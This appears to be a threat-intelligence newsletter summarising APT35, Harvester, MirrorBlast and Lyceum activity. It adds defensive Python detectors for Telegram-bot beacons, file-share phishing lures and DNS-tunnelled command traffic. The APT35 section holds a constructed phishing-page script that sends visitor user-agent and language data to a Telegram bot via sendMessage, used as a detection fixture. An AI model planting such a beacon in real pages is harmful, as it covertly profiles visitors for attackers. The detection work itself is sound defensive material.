At a glance.
- Charming Kitten phishing campaigns.
- Harvester APT conducts cyberespionage in South Asia.
- MirrorBlast malware targets financial entities.
- Lyceum APT's new malware.
Charming Kitten phishing campaigns.
Google's Threat Analysis Group (TAG) describes the ongoing activities of Iranian threat actor APT35 (also known as Charming Kitten). The threat actor is using phishing kits to set up credential-harvesting sites. Among its targets are people interested in the Munich Security Conference and the Think-20 (T20) Italy conference. TAG notes that the threat actor uses a Telegram bot to notify its operators when someone visits one of its phishing pages.
"One of APT35's novel techniques involves using Telegram for operator notifications. The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, user agent, and locales of visitors to their phishing sites in real time. We reported the bot to Telegram and they have taken action to remove it."
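The Telegram beacon TAG describes leaves a recognisable trace in two places a defender already has: the page content itself (a Bot API URL inside script) and the web proxy log (a browser calling sendMessage with the phishing page as Referer). The following is an added example, not code from Google TAG or from the campaign; the page snippet and proxy log lines are constructed, and the only real format it relies on is the public Telegram Bot API URL shape `api.telegram.org/bot<token>/<method>`.

```python
"""Spot the Telegram Bot API visitor beacon TAG describes: JavaScript in a
phishing page that calls sendMessage so the operator's channel receives the
visitor's IP, user agent and locale.

Added example, not code from Google TAG or from the campaign. The page
content and proxy log lines are constructed for illustration; the URL shape
api.telegram.org/bot<token>/<method> is the public Telegram Bot API format.
"""
import re
from dataclasses import dataclass
from typing import List

# Bot API calls embed the bot token in the path; tokens are "<bot id>:<secret>".
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)
# Browser properties a visitor-notification beacon reads before phoning home.
FINGERPRINT_HINTS = ("navigator.userAgent", "navigator.language", "navigator.platform")


@dataclass
class Finding:
    method: str           # Bot API method called, e.g. sendMessage
    bot_id: str           # numeric bot id; the secret half of the token is not retained
    source: str           # "page" for content scans, the Referer for proxy log hits
    fingerprinting: bool  # page also reads visitor properties


def _bot_id(token: str) -> str:
    return token.split(":", 1)[0]


def scan_page(html: str) -> List[Finding]:
    """One finding per Bot API call embedded in page content."""
    fingerprinting = any(hint in html for hint in FINGERPRINT_HINTS)
    return [
        Finding(m.group("method"), _bot_id(m.group("token")), "page", fingerprinting)
        for m in BOT_API_RE.finditer(html)
    ]


def scan_proxy_log(lines: List[str]) -> List[Finding]:
    """Flag proxy entries where a browser called sendMessage on the Bot API.

    Constructed log format: timestamp client method url status referer
    A Bot API call issued by a browser with a third-party page as Referer is
    unusual, so the Referer names the page worth investigating.
    """
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) != 6:
            continue
        url, referer = parts[3], parts[5]
        m = BOT_API_RE.match(url)
        if m and m.group("method") == "sendMessage":
            findings.append(Finding("sendMessage", _bot_id(m.group("token")), referer, False))
    return findings


# Constructed page content resembling the beacon TAG describes.
SAMPLE_PAGE = """<form action="/login">...</form>
<script>
fetch("https://api.telegram.org/bot123456789:AAFakeTokenForIllustration_0000000/sendMessage"
      + "?chat_id=@notifychan&text=" + encodeURIComponent(navigator.userAgent + " " + navigator.language));
</script>"""

# Constructed proxy log: one beacon from a visitor, one unrelated Bot API call.
SAMPLE_PROXY_LOG = """\
2021-10-14T10:02:11Z 10.0.0.5 GET https://login.example-lure.test/login 200 -
2021-10-14T10:02:12Z 10.0.0.5 GET https://api.telegram.org/bot123456789:AAFakeTokenForIllustration_0000000/sendMessage?chat_id=@notifychan&text=Mozilla 200 https://login.example-lure.test/login
2021-10-14T10:03:40Z 10.0.0.9 GET https://api.telegram.org/bot987654321:BBOtherFakeToken_11111111111/getUpdates 200 -
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE) + scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(finding)
```

The proxy-side check is the one that survives obfuscation of the page: however the script is packed, the browser still has to issue a request to the Bot API endpoint, and the Referer ties that request back to the landing page. Only the numeric bot id is kept so a finding can be shared with Telegram, as TAG did, without copying the token around.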
Harvester APT conducts cyberespionage in South Asia.
Symantec has spotted a previously unobserved threat actor dubbed "Harvester" targeting telecommunications, government, and IT entities in South Asia, particularly in Afghanistan. Symantec believes the threat actor is state-sponsored and is conducting cyberespionage using custom-made and publicly available malware:
"The attackers deployed a custom backdoor called Backdoor.Graphon on victim machines alongside other downloaders and screenshot tools that provided the attackers with remote access and allowed them to spy on user activities and exfiltrate information.
"We do not know the initial infection vector that Harvester used to compromise victim networks, but the first evidence we found of Harvester activity on victim machines was a malicious URL. The group then started to deploy various tools, including its custom Graphon backdoor, to gain remote access to the network. The group also tried to blend its activity in with legitimate network traffic by leveraging legitimate CloudFront and Microsoft infrastructure for its command and control (C&C) activity."
MirrorBlast malware targets financial entities.
Morphisec is tracking a MirrorBlast malware campaign that's targeting financial services companies. The malware is delivered via phishing emails with malicious Excel documents:
"In September we observed a malspam campaign delivering Excel documents as an attachment. This campaign targets multiple sectors from Canada, the United States, Hong Kong, Europe, and more. The attack chain starts with an email attachment document, but at a later stage, it changes to use the Google feedproxy URL with SharePoint and OneDrive lure, which poses as a file share request. These URLs lead to a compromised SharePoint or a fake OneDrive site that the attackers use to evade detection, in addition to a sign-in requirement (SharePoint) that helps to evade sandboxes."
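The later-stage lure Morphisec describes combines two things a mail gateway can score together: file-share wording (SharePoint or OneDrive) and a link that either passes through the Google feedproxy redirector or lands somewhere other than a Microsoft share host. The following is an added example, not Morphisec's code or the campaign's; the message bodies are constructed, `feedproxy.google.com` is assumed to be the redirector host meant by "Google feedproxy URL", and the allowlist of Microsoft share hosts is a simplification of what a real gateway would maintain.

```python
"""Mail-gateway heuristic for the lure chain Morphisec describes: a message
styled as a SharePoint/OneDrive file-share request whose link goes through
the Google feedproxy redirector or to a non-Microsoft host.

Added example, not Morphisec's code or the campaign's. The message bodies are
constructed. Assumptions: feedproxy.google.com is the redirector host meant
by "Google feedproxy URL", and the Microsoft share-host allowlist below is a
simplification of a real gateway's policy.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Wording that makes a message read as a file-share request.
SHARE_LURE_RE = re.compile(r"shared (a|the) (file|document)|OneDrive|SharePoint", re.IGNORECASE)
REDIRECTOR_HOSTS = {"feedproxy.google.com"}
MS_SHARE_HOSTS = ("sharepoint.com", "onedrive.live.com", "1drv.ms")


def is_ms_share_host(host: str) -> bool:
    """True for the allowlisted hosts and their subdomains (e.g. tenant.sharepoint.com)."""
    return any(host == h or host.endswith("." + h) for h in MS_SHARE_HOSTS)


def assess_message(body: str) -> Dict[str, object]:
    """Return the lure signals found in one message body and a verdict."""
    lure = SHARE_LURE_RE.search(body) is not None
    suspicious: List[Tuple[str, str]] = []
    for url in URL_RE.findall(body):
        host = (urlparse(url).hostname or "").lower()
        if host in REDIRECTOR_HOSTS:
            suspicious.append((url, "link passes through a feed redirector"))
        elif lure and not is_ms_share_host(host):
            suspicious.append((url, "share request links outside Microsoft share hosts"))
    # A redirector link alone (a newsletter digest, say) is not enough; the
    # combination with share-request wording is what the campaign relies on.
    verdict = "quarantine" if lure and suspicious else "allow"
    return {"share_lure": lure, "suspicious_urls": suspicious, "verdict": verdict}


# Constructed messages: a share-request lure through the redirector, and a
# share notification that links where it claims to.
LURE_MESSAGE = """Subject: Document shared with you
Alice shared a file with you on OneDrive.
Open: https://feedproxy.google.com/~r/constructed-feed/~3/example/share.html"""

LEGIT_MESSAGE = """Subject: Q3 report
Bob shared a document with you on SharePoint.
Open: https://contoso.sharepoint.com/:x:/g/personal/bob/EXAMPLE"""

if __name__ == "__main__":
    for name, body in (("lure", LURE_MESSAGE), ("legit", LEGIT_MESSAGE)):
        print(name, assess_message(body))
```

The sign-in wall on the compromised SharePoint site defeats sandboxes that try to follow the link, which is why this check deliberately scores the message before any link is visited.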
Lyceum APT's new malware.
Researchers at Kaspersky have observed the Lyceum APT (also known as Hexane) targeting two entities in Tunisia with new strains of malware:
"Our investigation into Lyceum has shown that the group has evolved its arsenal over the years and shifted its usage from the previously documented .NET malware to new versions, written in C++. We clustered those new pieces of malware under two different variants, which we dubbed 'James' and 'Kevin', after recurring names that appeared in the PDB paths of the underlying samples. As in the older DanBot instances, both variants supported similar custom C&C protocols tunneled over DNS or HTTP. That said, we also identified an unusual variant that did not contain any mechanism for network communication. We assume that it was used as a means to proxy traffic between two internal network clusters."
Kaspersky also noticed similarities between Lyceum and the DNSpionage campaign, which has been associated with the Iranian threat actor OilRig.
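Custom C&C tunneled over DNS, as Kaspersky describes for the 'James' and 'Kevin' variants, has a statistical shape that a resolver log exposes regardless of the protocol's details: many distinct, long, high-entropy subdomains under a single registered domain, frequently with TXT or NULL query types. The following per-domain profiler is an added example, not Kaspersky's code or the malware's protocol; the query log lines are constructed, and the "registered domain" is simplified to the last two labels (a real deployment would consult the public suffix list).

```python
"""Per-domain DNS profiling to surface the kind of DNS-tunnelled C&C that
Kaspersky attributes to Lyceum's 'James' and 'Kevin' variants: many unique,
long, high-entropy subdomains under one registered domain, often with TXT or
NULL query types.

Added example, not Kaspersky's code or the malware's protocol. The query log
lines are constructed; the "registered domain" is simplified to the last two
labels (a real deployment would use the public suffix list).
"""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List

RARE_QTYPES = {"TXT", "NULL"}
MIN_QUERIES = 5


@dataclass
class DomainProfile:
    queries: int
    unique_ratio: float      # distinct subdomains / queries (1.0 = never repeats)
    mean_sub_len: float      # average length of the subdomain part
    mean_entropy: float      # average Shannon entropy of the subdomain part, bits/char
    rare_qtype_ratio: float  # share of TXT/NULL queries

    def signals(self) -> int:
        """Count of tunnel indicators present (thresholds are illustrative)."""
        return sum([self.unique_ratio >= 0.8, self.mean_sub_len >= 20,
                    self.mean_entropy >= 3.0, self.rare_qtype_ratio >= 0.5])

    def is_suspicious(self) -> bool:
        return self.signals() >= 3


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def profile_domains(lines: List[str], min_queries: int = MIN_QUERIES) -> Dict[str, DomainProfile]:
    """Constructed log format: timestamp client qname qtype"""
    per_domain = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        labels = parts[2].rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # no subdomain, nothing to carry data in
        per_domain[".".join(labels[-2:])].append((".".join(labels[:-2]), parts[3].upper()))
    profiles = {}
    for domain, qs in per_domain.items():
        if len(qs) < min_queries:
            continue
        subs = [s for s, _ in qs]
        n = len(qs)
        profiles[domain] = DomainProfile(
            queries=n,
            unique_ratio=len(set(subs)) / n,
            mean_sub_len=sum(map(len, subs)) / n,
            mean_entropy=sum(map(shannon_entropy, subs)) / n,
            rare_qtype_ratio=sum(1 for _, t in qs if t in RARE_QTYPES) / n,
        )
    return profiles


def flag_tunnels(lines: List[str]) -> Dict[str, DomainProfile]:
    return {d: p for d, p in profile_domains(lines).items() if p.is_suspicious()}


# Constructed tunnel labels: rotations of one 16-hex-digit permutation plus its
# reverse, so each 32-char label is unique and uses every hex digit twice.
_PERM = "3f9a1c7e0b5d2846"
TUNNEL_LABELS = [_PERM[i:] + _PERM[:i] + _PERM[::-1] for i in range(6)]

SAMPLE_DNS_LOG = [
    f"2021-10-14T09:00:0{i}Z 10.0.0.7 {label}.c2-example.test TXT"
    for i, label in enumerate(TUNNEL_LABELS)
] + [
    "2021-10-14T09:00:10Z 10.0.0.7 www.example.org A",
    "2021-10-14T09:00:11Z 10.0.0.8 www.example.org A",
    "2021-10-14T09:00:12Z 10.0.0.8 mail.example.org A",
    "2021-10-14T09:00:13Z 10.0.0.9 www.example.org AAAA",
    "2021-10-14T09:00:14Z 10.0.0.9 cdn.example.org A",
    "2021-10-14T09:00:15Z 10.0.0.7 mail.example.org MX",
]

if __name__ == "__main__":
    for domain, profile in flag_tunnels(SAMPLE_DNS_LOG).items():
        print(domain, profile)
```

Requiring three of the four indicators keeps CDN and cloud hostnames, which are long but repeat, and short dynamic labels, which are unique but carry little, from tripping the rule; the thresholds themselves should be tuned against a baseline of the resolver's own traffic before being used for alerting.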